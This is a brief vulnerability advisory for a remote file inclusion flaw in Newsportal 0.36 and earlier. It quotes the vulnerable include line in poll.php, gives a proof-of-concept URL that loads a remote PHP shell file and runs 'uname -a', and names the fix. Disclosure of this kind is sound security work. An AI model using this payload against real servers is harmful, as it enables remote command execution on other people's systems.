Newsportal <= 0.36 Remote File Inclusion Vulnerability [+] Affected Software: Newsportal <= 0.36 + register_globals=on [+] Vendor: http://florian-amrhein.de/newsportal [+] Contact. philipp.niedziela@gmx.de [+] Vuln discovered by: Florian Amrhein [+] PoC by: Philipp Niedziela // CODE [newsportal]/extras/poll/poll.php --------------------------------------------

Lese Overview- und Artikeldaten ein...

VULN include("$file_newsportal"); // <----- VULN $ns=OpenNNTPconnection($server,$port); flush(); if ($ns != false) { $headers = readOverview($ns,$group,1,true); closeNNTPconnection($ns); } ?>

// CODE -------------------------------------------- [+] PoC: http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a [+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php [+] Greets: Lenni :)